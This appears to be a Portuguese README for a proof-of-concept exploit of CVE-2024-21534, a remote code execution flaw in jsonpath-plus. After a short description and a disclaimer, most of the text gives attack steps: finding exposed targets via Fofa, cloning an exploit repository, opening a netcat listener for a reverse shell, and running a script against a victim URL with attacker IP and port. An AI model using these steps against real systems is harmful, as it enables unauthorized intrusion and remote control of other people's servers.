
POC - CVE-2024-21534 Jsonpath-plus vulnerável a Execução Remota de Código (RCE) devido à sanitização inadequada de entrada
CVE-2024-21534 é uma vulnerabilidade crítica encontrada em versões do pacote jsonpath-plus anteriores à versão 10.0.0. A vulnerabilidade decorre da sanitização inadequada de entrada, o que pode levar à Execução Remota de Código (RCE) em sistemas afetados. Essa vulnerabilidade é particularmente perigosa, pois pode ser explorada sem autenticação, permitindo que atacantes executem código arbitrário no servidor enviando entrada especialmente elaborada. Esse problema surge do uso padrão inseguro do módulo vm do Node.js, que, se explorado, pode comprometer todo o sistema.
jsonpath-plus versões anteriores a 10.2.0
A vulnerabilidade está localizada no pacote jsonpath-plus, amplamente utilizado para consultar estruturas de dados JSON em aplicações. A falha se deve à sanitização inadequada de entrada, permitindo a execução de código malicioso.
Leia sobre — CVE-2024-21534
Aviso: Esta Prova de Conceito (POC) foi feita apenas para fins educacionais e de testes éticos. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer a todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou danos causados por este programa.
Para encontrar possíveis alvos, use o Fofa (semelhante ao Shodan.io):
Jsonpath-plus
Primeiro, clone o repositório:
git clone https://github.com/verylazytech/CVE-2024-21534
Agora abra um listener usando nc:
nc -lnvp 443
Execute o exploit:
Certifique-se de que a URL aponte para um endpoint que processe a entrada do usuário por meio do pacote jsonpath-plus vulnerável, pois isso permitirá a exploração da vulnerabilidade de RCE.
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

